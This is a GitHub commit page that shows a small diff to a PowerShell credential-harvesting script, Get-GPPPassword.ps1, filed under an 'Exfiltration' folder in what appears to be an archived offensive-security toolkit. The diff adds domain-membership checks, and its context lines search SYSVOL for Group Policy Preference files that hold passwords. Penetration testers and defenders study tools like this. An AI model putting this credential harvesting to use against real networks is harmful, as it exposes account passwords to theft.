Skip to content
This repository was archived by the owner on Jan 21, 2021. It is now read-only.

Commit eb85e1c

Browse files
committed
Terminating Errors Added
Added checks to ensure that the script is being ran on a domain-joined machine and with a domain account.
1 parent 371c65c commit eb85e1c

File tree

1 file changed

+5
-1
lines changed

1 file changed

+5
-1
lines changed

Exfiltration/Get-GPPPassword.ps1

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -60,6 +60,10 @@
6060
catch {Write-Error "$Error[0]"}
6161
}
6262

63+
#ensure that machine is domain joined and script is running as a domain account
64+
if (((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False) {throw 'Machine is not joined to a domain.'}
65+
if (($Env:USERDNSDOMAIN) -eq $Null) {throw 'Account is not a domain account.'}
66+
6367
#discover potential files containing passwords
6468
$XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -Include 'groups.xml','services.xml','scheduledtasks.xml','datasources.xml'
6569

@@ -123,4 +127,4 @@
123127

124128
catch {Write-Error $Error[0]}
125129
}
126-
}
130+
}

0 commit comments

Comments
 (0)